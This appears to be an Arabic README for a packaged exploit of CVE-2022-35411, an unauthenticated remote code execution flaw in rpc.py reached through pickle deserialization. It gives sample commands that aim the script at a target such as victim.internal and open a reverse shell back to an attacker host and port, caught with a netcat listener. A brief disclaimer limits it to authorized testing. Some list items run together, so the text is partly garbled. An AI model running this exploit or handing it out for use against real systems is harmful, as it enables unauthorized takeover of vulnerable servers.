
استغلال لـ CVE-2022-35411 — ثغرة RCE غير مصادق عليها في rpc.py (<= 0.6.0)
هذا استغلال محدث ومحسن لـ CVE-2022-35411، يستهدف الإصدارات الضعيفة من rpc.py (<= 0.6.0).
يسمح بتنفيذ الأوامر عن بعد بدون مصادقة (RCE) عبر إلغاء تسلسل pickle في بايثون.
الاستغلال الأصلي بواسطة: Elias Hohl
المحسَّن بواسطة: x7331 لسهولة الاستخدام وقابلية النقل والأتمتة
تكمن الثغرة في الاستخدام غير الآمن لوحدة pickle في بايثون من قبل rpc.py، مما يسمح بحمولات مصممة لتنفيذ أوامر عشوائية بدون مصادقة.
v0.4.2 – v0.6.0argparse مع خيارات --lhost و --lport و --target و --dry-run-h / --helppython3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests (قم بتثبيتها باستخدام pip install requests)nc -lvnp 9001)يتم توفير هذا الاستغلال لأغراض تعليمية واختبارية مصرح بها فقط. لا تستخدمه على أنظمة لا تملكها أو تفتقر إلى إذن صريح لاختبارها.